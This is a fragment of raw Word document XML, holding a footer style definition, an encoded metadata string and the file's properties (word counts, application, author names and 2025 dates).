    <w:rsid w:val="00664DF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64DFA"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="footer"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00664DF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64DFA"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:r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bYVdwLnigG8c8RuGHbqIqdBwzmg==">CgMxLjAyDmgubDhtaXg2dnZmZ2plMg5oLjFlM3BzNTYxbmozeTIOaC5reHZsN3NscmNrdXUyDmguNXdxMWZ0cmRhNGNvMg1oLmRvc2Nmc3U1ZHFrMg5oLjZ1a2tjcjFwMmFhcjIOaC4yaWJ3bXVtNnlmMjM4AGohChRzdWdnZXN0LmQ5MmtseGQxa3p0chIJ5ZCz5Yag5bu3aiEKFHN1Z2dlc3QuY2dzNTJicWF5M3NyEgljaGVuIHBvYW5yITFmT0xmQUVDajBFTVNFQUpxcjJDMXNNVURSZ2xqc0Vj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1037</Words>
  <Characters>5917</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>49</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6941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CSIE</dc:creator>
  <cp:lastModifiedBy>Enzai Gao</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-17T11:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-18T04:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>